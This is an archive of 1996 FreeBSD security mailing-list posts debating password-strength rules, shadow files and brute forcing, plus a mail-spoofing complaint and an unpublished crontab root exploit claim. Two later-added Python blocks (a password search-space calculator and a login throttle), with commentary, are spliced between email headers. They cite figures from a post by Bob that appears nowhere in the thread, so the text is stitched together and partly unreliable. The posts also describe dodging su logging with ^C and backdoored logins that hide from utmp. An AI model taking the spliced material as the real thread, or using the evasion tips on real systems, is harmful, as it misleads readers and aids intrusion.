From owner-freebsd-security Sun Dec 15 13:43:07 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA02225 for security-outgoing; Sun, 15 Dec 1996 13:43:07 -0800 (PST) Received: from dfw.dfw.net (aleph1@[198.175.15.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id NAA02187; Sun, 15 Dec 1996 13:43:00 -0800 (PST) Received: from localhost by dfw.dfw.net (4.1/SMI-4.1) id AA19213; Sun, 15 Dec 96 15:40:44 CST Date: Sun, 15 Dec 1996 15:40:43 -0600 (CST) 
From: Aleph One
To: Terry Lambert
Cc: Bob Bishop , proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: vulnerability in new pw suite
In-Reply-To: <199612152039.NAA23837@phaeton.artisoft.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 15 Dec 1996, Terry Lambert wrote:

> I'm tired of having passwd not let me use whatever password I want,
> considering that with a shadow file, the user will have to brute-force
> it through /bin/login or equivalent. It seems the harder it becomes to
> see my post-encryption password, the more anal the passwd command
> becomes about making post-encryption passwords "safe" from attacks
> which are impossible to institute unless root has been compromised.

Just because the passwd is shadowed does not mean it won't be cracked. There are programs that will brute force passwords using POP, TELNET, RSH, etc.

>
> 					Regards,
> 					Terry Lambert
> 					terry@lambert.org
> ---
> Any opinions in this posting are my own and not those of my present
> or previous employers.
>

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Sun Dec 15 13:56:42 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id NAA03939 for security-outgoing; Sun, 15 Dec 1996 13:56:42 -0800 (PST)
Received: from sol.acs.uwosh.edu (newsol.acs.uwosh.edu [141.233.143.1]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id NAA03930 for ; Sun, 15 Dec 1996 13:56:40 -0800 (PST)
Received: (qmail 18434 invoked from smtpd); 15 Dec 1996 21:57:24 -0000
Received: from epsilon (HELO epsilon.acs.uwosh.edu) (unknown@141.233.143.33) by smtp.acs.uwosh.edu with SMTP; 15 Dec 1996 21:57:24 -0000
Received: (qmail 20065 invoked by uid 1096); 15 Dec 1996 21:57:25 -0000
Date: Sun, 15 Dec 1996 15:57:24 -0600 (CST)
From: "Brian T. Wightman" X-Sender: wightman@epsilon To: security@freebsd.org Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152039.NAA23837@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Sun, 15 Dec 1996, Terry Lambert wrote: > Date: Sun, 15 Dec 1996 13:39:04 -0700 (MST) 
> From: Terry Lambert
> To: Bob Bishop
> Cc: terry@lambert.org, proff@iq.org, security@freebsd.org,
>     hackers@freebsd.org
> Subject: Re: vulnerability in new pw suite
>
> I'm tired of having passwd not let me use whatever password I want,
> considering that with a shadow file, the user will have to brute-force
> it through /bin/login or equivalent. It seems the harder it becomes to
> see my post-encryption password, the more anal the passwd command
> becomes about making post-encryption passwords "safe" from attacks
> which are impossible to institute unless root has been compromised.
>
> Just my opinion about anal passwd programs...

I have seen arguments made on both sides of this issue. One thing that I can see as a positive of an anal passwd program is that it turns a dictionary attack into a brute force attack.

	Number of all possible passwords == P
	Number of words in a dictionary that can be used in a "reasonable"
	amount of time, and which are denied by the passwd program == D
	(reasonable needs to be defined here)

	P - D = p

As long as (p >> D), not using an anal password program reduces a brute force attack to a dictionary attack. When D becomes close in size to p, then brute force == dictionary, and the requirements / restrictions gain you nothing.

Since people will by nature pick "easy" to remember passwords (words in the dictionary D), if D is small enough to require a cracker to use a brute force attack instead of a dictionary attack, then it is a good thing. When D becomes large enough to frustrate the users and "force" them to post-it-note the passwords, or make a dictionary search about as equal as a brute force attack, then it has gone beyond the goodness factor (in my mind, anyway).

A little bit of anality, like not allowing the username, the most common first names, machine names, etc as a password, is probably a good thing. Making it so that (for whatever reason) Fic.He"" becomes a bad password (Fire is cool. Heh Heh Heh) (well, now it is ;) is not a good thing since it introduces other problems with the password system (post-it syndrome, etc).

Just my $0.02

Brian

From owner-freebsd-security Sun Dec 15 14:46:11 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA09411 for security-outgoing; Sun, 15 Dec 1996 14:46:11 -0800 (PST)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA09387; Sun, 15 Dec 1996 14:46:06 -0800 (PST)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id PAA24138; Sun, 15 Dec 1996 15:21:44 -0700
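Bob's search-space arithmetic earlier in the thread and Brian's P - D = p argument above, carried out in an added Python example that is not from either post. It counts passwords of a given length over an assumed alphabet of the 95 printable ASCII characters, applies "at least one character from class X" rules by inclusion-exclusion (the general form of which "one non-alphanumeric character" is one instance), and reports how large the surviving space is relative to an assumed dictionary of denied passwords. The alphabet split, the dictionary size and the guess rate are assumptions, not figures from the thread.

```python
"""Password search-space arithmetic for composition rules.

Added example, not from the thread.  The alphabet is the 95 printable
ASCII characters split into four classes; the denied-dictionary size D and
the guess rate are assumed round numbers.
"""
import math
from itertools import combinations

CLASSES = {"lower": 26, "upper": 26, "digit": 10, "symbol": 33}   # 95 printable ASCII
ALPHABET = sum(CLASSES.values())


def search_space(length, alphabet=ALPHABET):
    """All strings of `length` over `alphabet` symbols (Bob's 'usable passwords')."""
    return alphabet ** length


def space_requiring(length, required, alphabet=ALPHABET, classes=CLASSES):
    """Strings of `length` containing at least one character from every class
    named in `required`.  Inclusion-exclusion over the set S of required
    classes that are *absent*: sum over S of (-1)^|S| * (alphabet - |S|)^length,
    where |S| is the number of characters the absent classes account for."""
    sizes = [classes[name] for name in required]
    total = 0
    for k in range(len(sizes) + 1):
        for absent in combinations(sizes, k):
            total += (-1) ** k * (alphabet - sum(absent)) ** length
    return total


def bits(n):
    """Search space expressed as bits of entropy for uniform choice."""
    return math.log2(n)


def policy_tradeoff(total, denied):
    """Brian's P - D = p.  Returns (p, p / D): how many passwords survive the
    policy and how much larger the brute-force space still is than the
    dictionary the policy removed.  The policy is useful while p >> D."""
    remaining = total - denied
    return remaining, remaining / denied


def years_to_exhaust(space, guesses_per_second):
    return space / guesses_per_second / (365 * 24 * 3600)


def report(length=8, denied=200_000, rate=1_000_000):
    """Worked numbers for the thread's 8-character case.  `denied` is Bob's
    c. 2 x 10^5 unsafe passwords per user; `rate` (guesses/s) is assumed."""
    unrestricted = search_space(length)
    one_symbol = space_requiring(length, ["symbol"])
    all_four = space_requiring(length, list(CLASSES))
    remaining, ratio = policy_tradeoff(unrestricted, denied)
    return {
        "unrestricted": unrestricted,
        "unrestricted_bits": round(bits(unrestricted), 1),
        "at_least_one_symbol": one_symbol,
        "all_four_classes": all_four,
        "fraction_kept_all_four": all_four / unrestricted,
        "p_over_D": ratio,
        "years_unrestricted": years_to_exhaust(unrestricted, rate),
    }


if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key:24s} {value:,}" if isinstance(value, int) else f"{key:24s} {value:.3g}")
```

The point the numbers make is Brian's: requiring a symbol removes a few per cent of the total space, while the denied dictionary D is smaller than the remaining space p by many orders of magnitude, so the rule costs the honest user little and forces the attacker from a dictionary search to a brute-force one.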
From: Terry Lambert
Message-Id: <199612152221.PAA24138@phaeton.artisoft.com>
Subject: Re: vulnerability in new pw suite
To: aleph1@dfw.net (Aleph One)
Date: Sun, 15 Dec 1996 15:21:44 -0700 (MST)
Cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG
In-Reply-To: from "Aleph One" at Dec 15, 96 03:40:43 pm
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> Just because the passwd is shadowed does not mean it won't be cracked. There
> are programs that will brute force passwords using POP, TELNET, RSH, etc.

And as a result will hit source/attempt based security triggers on any real machine, and automatically shut down future attempts until such time as the administrator can deal with the alerts to the system's satisfaction.

Try five failed login attempts to telnet on a Sun machine. It delays (and reports) each failed attempt, and drops the connection (after a huge delay) after the fifth.

					Regards,
					Terry Lambert
					terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.

From owner-freebsd-security Sun Dec 15 15:06:21 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA12263 for security-outgoing; Sun, 15 Dec 1996 15:06:21 -0800 (PST)
Received: from garrison.inetcan.net (dreamer@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id PAA12252; Sun, 15 Dec 1996 15:06:13 -0800 (PST)
Received: (from dreamer@localhost) by garrison.inetcan.net (8.8.4/8.8.4) id RAA10623; Sun, 15 Dec 1996 17:10:04 -0700
Date: Sun, 15 Dec 1996 17:10:04 -0700 (MST)
From: Digital Dreamer
To: Terry Lambert
cc: Bob Bishop , terry@lambert.org, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: vulnerability in new pw suite
In-Reply-To: <199612152039.NAA23837@phaeton.artisoft.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 15 Dec 1996, Terry Lambert wrote:

> Heh.
>
> Please define "unsafe" in the context of a functional (inaccessible for
> pre-salt-based attacks) shadow password system.
>
> 8-) 8-).
>
> I'm tired of having passwd not let me use whatever password I want,
> considering that with a shadow file, the user will have to brute-force
> it through /bin/login or equivalent. It seems the harder it becomes to
> see my post-encryption password, the more anal the passwd command
> becomes about making post-encryption passwords "safe" from attacks
> which are impossible to institute unless root has been compromised.
>
> Just my opinion about anal passwd programs...

The idea, from what I understand, is to act as if you don't have shadow passwords, and therefore not rely on them. Security through obscurity and all that.

For example, let's say someone breaks root on your machine. Ok, you're in a lot of trouble. But let's attempt to minimize the damage by not giving them 6e12 accounts to log on as in the future when/if they're discovered by handing over the passwords for them on a silver plate. It takes a lot longer to get all your users to change passwords than it takes to fix a backdoored /bin/login.
dreamer From owner-freebsd-security Sun Dec 15 15:13:09 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA12873 for security-outgoing; Sun, 15 Dec 1996 15:13:09 -0800 (PST) Received: from dfw.dfw.net (aleph1@dfw.dfw.net [198.175.15.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA12853; Sun, 15 Dec 1996 15:12:59 -0800 (PST) Received: from localhost by dfw.dfw.net (4.1/SMI-4.1) id AA29130; Sun, 15 Dec 96 17:10:51 CST Date: Sun, 15 Dec 1996 17:10:51 -0600 (CST) 
From: Aleph One
To: Terry Lambert
Cc: rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG
Subject: Re: vulnerability in new pw suite
In-Reply-To: <199612152221.PAA24138@phaeton.artisoft.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sun, 15 Dec 1996, Terry Lambert wrote:

> Try five failed login attempts to telnet on a Sun machine. It delays
> (and reports) each failed attempt, and drops the connection (after a
> huge delay) after the fifth.

Try su on a Solaris machine and if it takes too long hit ^C. The attempt will not be logged. You assume all such attempts will be logged and trigger some alarm. You also assume they are triggered on all systems that can verify a password. That's a lot of assumptions. It's easier to cut bad passwords at the source.

> 					Regards,
> 					Terry Lambert
> 					terry@lambert.org
> ---
> Any opinions in this posting are my own and not those of my present
> or previous employers.
>

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Sun Dec 15 15:30:54 1996 Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA14643 for security-outgoing; Sun, 15 Dec 1996 15:30:54 -0800 (PST)
Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA14623; Sun, 15 Dec 1996 15:30:47 -0800 (PST)
Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id QAA00303; Sun, 15 Dec 1996 16:25:42 -0700
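The two sides of the Terry/Aleph exchange, as an added Python example that is neither Sun's login nor anything posted in the thread: a per-source failure counter that delays each failed attempt, logs it, and drops the connection after the fifth (Terry's description), written so that the attempt is recorded before the password check runs, which is the property Aleph's ^C observation says the su he tried lacks. The threshold, delay schedule, account names and log format are assumptions.

```python
"""Failed-login throttling that records the attempt before verifying it.

Added example, not from the thread and not any vendor's login(1).  Policy
numbers, account names and the log format are assumed.
"""
import time

MAX_FAILURES = 5      # assumed: drop the connection on the fifth failure
BASE_DELAY = 1.0      # assumed: seconds of delay per consecutive failure


class PasswordVerifier:
    """Stand-in for the real check.  `interrupt_on` simulates a user hitting
    ^C (KeyboardInterrupt) while a slow verification is running."""

    def __init__(self, accounts, interrupt_on=()):
        self.accounts = accounts
        self.interrupt_on = set(interrupt_on)

    def verify(self, user, password):
        if (user, password) in self.interrupt_on:
            raise KeyboardInterrupt
        return self.accounts.get(user) == password


class LoginThrottle:
    def __init__(self, verifier, sleep=time.sleep):
        self.verifier = verifier
        self.sleep = sleep          # injectable so a test does not really wait
        self.failures = {}          # source -> consecutive failures
        self.log = []               # constructed audit lines

    def attempt(self, source, user, password):
        """Returns 'ok', 'fail' or 'dropped'."""
        n = self.failures.get(source, 0)
        # Audit record first: an attempt that is interrupted, or never
        # finishes, still leaves a trace.
        self.log.append(f"login attempt from {source} for {user!r} (prior failures={n})")
        try:
            good = self.verifier.verify(user, password)
        except KeyboardInterrupt:
            good = False            # an interrupted attempt counts as a failure
            self.log.append(f"attempt from {source} for {user!r} interrupted")
        if good:
            self.failures.pop(source, None)
            self.log.append(f"login ok from {source} for {user!r}")
            return "ok"
        n += 1
        self.failures[source] = n
        self.sleep(BASE_DELAY * n)  # escalating delay keeps online guessing slow
        self.log.append(f"FAILED login from {source} for {user!r} ({n}/{MAX_FAILURES})")
        if n >= MAX_FAILURES:
            self.log.append(f"dropping connection from {source} after {n} failures")
            return "dropped"
        return "fail"


def demo():
    """Five guesses from one source (the third interrupted with ^C), then a
    correct login from another source.  Returns (outcomes, delays, log)."""
    delays = []
    verifier = PasswordVerifier({"doug": "correct horse"},
                                interrupt_on={("doug", "guess3")})
    throttle = LoginThrottle(verifier, sleep=delays.append)
    outcomes = [throttle.attempt("203.0.113.5", "doug", f"guess{i}") for i in range(1, 6)]
    outcomes.append(throttle.attempt("192.0.2.8", "doug", "correct horse"))
    return outcomes, delays, throttle.log


if __name__ == "__main__":
    outcomes, delays, log = demo()
    print(outcomes, delays)
    print("\n".join(log))
```

Aleph's second point, that the trigger has to exist on every service that can verify a password (POP, rsh, su, and so on), is not something a single daemon can fix; the counter above would have to be shared, for example through the same audit log, to cover a guesser that spreads attempts across services.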
From: Terry Lambert Message-Id: <199612152325.QAA00303@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: dreamer@garrison.inetcan.net (Digital Dreamer) Date: Sun, 15 Dec 1996 16:25:42 -0700 (MST) Cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG In-Reply-To: from "Digital Dreamer" at Dec 15, 96 05:10:04 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > Just my opinion about anal passwd programs... > > The idea, from what I understand, is to act as if you don't have shadow > passwords, and therefore not rely on them. Security through obscurity > and all that. > > For example, let's say someone breaks root on your machine. Ok, you're > in a lot of trouble. But let's attempt to minimize the damage by not > giving them 6e12 accounts to log on as in the future when/if they're > discovered by handing over the passwords for them on a silver plate. It > takes a lot longer to get all your users to change passwords than it > takes to fix a backdoored /bin/login. A backdoored /bin/login can be nothing more than a program that mails account/password pairs. Be that as it may, by logical extension, we should act as if we didn't have passwords, and therefore not rely on them. Didn't know you were a radical Stallmanite... 8-) 8-). The reductio-ad-absurdum of this is wondering if someone has bribed the person who digs the rocks that are used to manufacture the nitric acid that is used for soaking the gun cotton at the ammunition plant that supplies the bullets to the Government you got your Marine guards from so their guns don't go off when the person who did the bribing comes to break in to the 10M drive on your PC-XT. 
You could also worry that someone would fake an accident so that while delivering the pick to the store where the guy who digs the rocks' boss's purchasing agent got his pick, they could substitute a different pick so that the rocks it was used on would fail to make good nitric acid.

Not to mention the guy who planted the tree 120 years ago, which was milled into the handle for that pick... after all, this could be a wide-ranging conspiracy which has been in planning for centuries.

...like they wouldn't just send masked ninjas to get your disk. 8-P.

Regards,
Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.

From owner-freebsd-security Sun Dec 15 15:32:14 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA14845 for security-outgoing; Sun, 15 Dec 1996 15:32:14 -0800 (PST) Received: from garrison.inetcan.net (dreamer@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id PAA14840; Sun, 15 Dec 1996 15:32:11 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.8.4/8.8.4) id RAA11139; Sun, 15 Dec 1996 17:36:12 -0700 Date: Sun, 15 Dec 1996 17:36:12 -0700 (MST)
From: Digital Dreamer To: Terry Lambert cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG Subject: Re: vulnerability in new pw suite In-Reply-To: <199612152325.QAA00303@phaeton.artisoft.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Sun, 15 Dec 1996, Terry Lambert wrote:

> > For example, let's say someone breaks root on your machine. Ok, you're
> > in a lot of trouble. But let's attempt to minimize the damage by not
> > giving them 6e12 accounts to log on as in the future when/if they're
> > discovered by handing over the passwords for them on a silver plate. It
> > takes a lot longer to get all your users to change passwords than it
> > takes to fix a backdoored /bin/login.
>
> A backdoored /bin/login can be nothing more than a program that mails
> account/password pairs.

Really? In a lot of places, /bin/login is suid. It's a common trick to have a backdoored login that will let you in as any user if you supply the correct backdoor password, and even better, it neglects to put your login in utmp so a 'w' won't show you.

> Be that as it may, by logical extension, we should act as if we didn't
> have passwords, and therefore not rely on them.

In fact, it seems that is a rather good idea for places where security is imperative. Secure your system from the inside as well, so if someone does break into your machine, they can't get root. Secure it from the inside, even if you don't (think you have) any holes allowing those from the outside to get in.

> from so their guns don't go off when the person who did the bribing
> comes to break into the 10M drive on your PC-XT.

It's 2MB, and the ST-506 controller went last week.
dreamer From owner-freebsd-security Sun Dec 15 15:44:56 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA16142 for security-outgoing; Sun, 15 Dec 1996 15:44:56 -0800 (PST) Received: from phaeton.artisoft.com (phaeton.Artisoft.COM [198.17.250.211]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA16115; Sun, 15 Dec 1996 15:44:51 -0800 (PST) Received: (from terry@localhost) by phaeton.artisoft.com (8.6.11/8.6.9) id QAA00213; Sun, 15 Dec 1996 16:36:04 -0700 
From: Terry Lambert Message-Id: <199612152336.QAA00213@phaeton.artisoft.com> Subject: Re: vulnerability in new pw suite To: dreamer@garrison.inetcan.net (Digital Dreamer) Date: Sun, 15 Dec 1996 16:36:04 -0700 (MST) Cc: terry@lambert.org, rb@gid.co.uk, proff@iq.org, security@FreeBSD.ORG, hackers@FreeBSD.ORG In-Reply-To: from "Digital Dreamer" at Dec 15, 96 05:36:12 pm X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > from so their guns don't go off when the person who did the bribing > > comes to break in to the 10M drive on your PC-XT. > > It's 2MB, and the ST-506 controller went last week. Fool! Your machine is not safe... all ninjas worth their salt carry extra ST-506 controllers! Do you know nothing of Tai-Kwan Leap? Regards, Terry Lambert terry@lambert.org --- Any opinions in this posting are my own and not those of my present or previous employers. From owner-freebsd-security Sun Dec 15 16:18:46 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA20942 for security-outgoing; Sun, 15 Dec 1996 16:18:46 -0800 (PST) Received: from isbalham.ist.co.uk (isbalham.ist.co.uk [192.31.26.1]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA20910; Sun, 15 Dec 1996 16:18:36 -0800 (PST) Received: from gid.co.uk (uucp@localhost) by isbalham.ist.co.uk (8.8.4/8.8.4) with UUCP id AAA03019; Mon, 16 Dec 1996 00:04:03 GMT Date: Mon, 16 Dec 1996 00:03:01 GMT Received: from [194.32.164.2] by seagoon.gid.co.uk; Mon, 16 Dec 1996 00:03:01 GMT X-Sender: rb@194.32.164.1 Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Terry Lambert 
From: rb@gid.co.uk (Bob Bishop) Subject: Re: vulnerability in new pw suite Cc: proff@iq.org, security@freebsd.org, hackers@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk At 1:39 pm 15/12/96, Terry Lambert wrote: >Heh. > >Please define "unsafe" in the context of a functional (inaccessible for >pre-salt-based attacks) shadow password system. > >8-) 8-). > >I'm tired of having passwd not let me use whatever password I want, >considering that with a shadow file, the user will have to brute-force >it through /bin/login or equivalent. It seems the harder it becomes to >see my post-encryption password, the more anal the passwd command >becomes about making post-encryption passwords "safe" from attacks >which are impossible to institute unless root has been compromised. Yeah, fine on an isolated machine, but those pesky users also insist on using the same weak password on lots of different systems. So if some sleaze does manage to get root on your system and thus access to your shadow file, five gets you ten the user passwords he can now derive will work on neighbouring systems. -- Bob Bishop (0118) 977 4017 international code +44 118 rb@gid.co.uk fax (0118) 989 4254 between 0800 and 1800 UK From owner-freebsd-security Sun Dec 15 18:48:02 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id SAA02428 for security-outgoing; Sun, 15 Dec 1996 18:48:02 -0800 (PST) Received: from ns.cs.hku.hk (ns.cs.hku.hk [147.8.178.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id SAA02409 for ; Sun, 15 Dec 1996 18:47:59 -0800 (PST) Received: from champion (champion.cs.hku.hk) by ns.cs.hku.hk with SMTP id AA15439 (5.67b/IDA-1.5 for ) Mon, 16 Dec 1996 10:47:15 +0800 Received: by champion (4.1/S2.0-sunos4) id AA24199; Mon, 16 Dec 96 10:47:01 HKT Date: Mon, 16 Dec 1996 10:47:01 +0800 (HKT) 
From: Doug Kwan ~{9XUq5B~} To: Cy Schubert - ITSD Open Systems Group Cc: security@freebsd.org Subject: Re: mail bomb! In-Reply-To: <199612151550.HAA14407@passer.osg.gov.bc.ca> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Hi,

On Sun, 15 Dec 1996, Cy Schubert - ITSD Open Systems Group wrote:

> I've used the following to ban known advertisers to my desktop Alpha
> at work. Someone had posted it on BUGTRAQ about six months ago and
> unfortunately I cannot remember his name.
>

Unfortunately, that jerk uses a fake e-mail address. He sent mail in our support account's name. We cannot filter mails from our support account.

Thanks

-Doug

From owner-freebsd-security Sun Dec 15 21:37:56 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id VAA07961 for security-outgoing; Sun, 15 Dec 1996 21:37:56 -0800 (PST) Received: from molhub.mol.net.my (molhub.mol.net.my [202.190.128.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id VAA07955; Sun, 15 Dec 1996 21:37:50 -0800 (PST) Received: from pc-65kl1.mol.net.my by molhub.mol.net.my; Mon, 16 Dec 96 13:37:34 -0800 X-Sender: mfwong@mol.net.my X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: questions@freebsd.org
From: Mun Fai WONG Subject: FreeBSD vs BorderWare Cc: security@freebsd.org Message-Id: <32b5c1243534002@molhub.mol.net.my> Date: Mon, 16 Dec 96 13:37:45 -0800 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Hi,

I am given the opportunity to propose an Internet gateway/server with security features in the form of a firewall mechanism. The prospective customers seem to be more keen on BorderWare as the solution for the following reasons:

1) It is based on a secured OS philosophy
2) It is "commercially" backed by the vendor
3) It has been tested
4) Availability of the source to the modified kernel is impossible compared to FreeBSD, as FreeBSD is a very "open" software distribution with source code freely available.
5) It does VPN, NAT and Secured Server Network (SSN, vs DMZ)

So, I would really like to get a frank opinion/experience/suggestions on how people rate FreeBSD 2.1 onwards against BorderWare etc. in terms of security features. Personally, I have only read through the BorderWare whitepaper and have not had the chance to actually put my hands on it, and I would really appreciate any feedback.

Thanks in advance.

From owner-freebsd-security Sun Dec 15 21:40:45 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id VAA08113 for security-outgoing; Sun, 15 Dec 1996 21:40:45 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id VAA08108; Sun, 15 Dec 1996 21:40:42 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZVj9-00049U-00; Sun, 15 Dec 1996 22:36:35 -0700 To: Terry Lambert Subject: Re: vulnerability in new pw suite Cc: dreamer@garrison.inetcan.net (Digital Dreamer), rb@gid.co.uk, proff@iq.org, security@freebsd.org, hackers@freebsd.org In-reply-to: Your message of "Sun, 15 Dec 1996 16:36:04 MST."
<199612152336.QAA00213@phaeton.artisoft.com> References: <199612152336.QAA00213@phaeton.artisoft.com> Date: Sun, 15 Dec 1996 22:36:35 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199612152336.QAA00213@phaeton.artisoft.com> Terry Lambert writes: : Fool! Your machine is not safe... all ninjas worth their salt carry : extra ST-506 controllers! Do you know nothing of Tai-Kwan Leap? And to Terry Lambert, I leave a boot to the head... :-) Warner "I learned Tai-Kwan Leap to kick some bootie" Losh From owner-freebsd-security Sun Dec 15 22:17:51 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id WAA09220 for security-outgoing; Sun, 15 Dec 1996 22:17:51 -0800 (PST) Received: from silver.sms.fi (root@silver.sms.fi [194.111.122.17]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id WAA09212 for ; Sun, 15 Dec 1996 22:17:48 -0800 (PST) Received: (from pete@localhost) by silver.sms.fi (8.7.6/8.7.3) id IAA03360; Mon, 16 Dec 1996 08:17:17 +0200 (EET) Date: Mon, 16 Dec 1996 08:17:17 +0200 (EET) Message-Id: <199612160617.IAA03360@silver.sms.fi> 
From: Petri Helenius To: Doug Kwan ~{9XUq5B~} Cc: Cy Schubert - ITSD Open Systems Group , security@freebsd.org Subject: Re: mail bomb! In-Reply-To: References: <199612151550.HAA14407@passer.osg.gov.bc.ca> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Doug Kwan ~{9XUq5B~} writes:

> Hi,
>
> Unfortunately, that jerk uses a fake e-mail address. He sent mail
> in our support account's name. We cannot filter mails from our
> support account.
>

Have you ever considered using PGP signatures to verify the authenticity of your postings? If the necessity of verifying the signature were communicated at signup time, it would be the 'user's fault' if he/she believed the message without verifying it.

Pete

From owner-freebsd-security Mon Dec 16 00:07:06 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA12199 for security-outgoing; Mon, 16 Dec 1996 00:07:06 -0800 (PST) Received: from xkis.kis.ru (root@xkis.kis.ru [194.87.66.200]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA12194; Mon, 16 Dec 1996 00:06:59 -0800 (PST) Received: from localhost (dv@localhost) by xkis.kis.ru (8.8.3/8.8.3) with SMTP id LAA12081; Mon, 16 Dec 1996 11:05:20 +0300 (MSK) Date: Mon, 16 Dec 1996 11:05:19 +0300 (MSK)
From: Dmitry Valdov To: freebsd-bugs@freebsd.org, freebsd-security@freebsd.org Subject: crontab security hole Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Hello!

Are there any fixes for crontab? I've an exploit which allows any user to become root using a crontab security hole.

Dmitry.

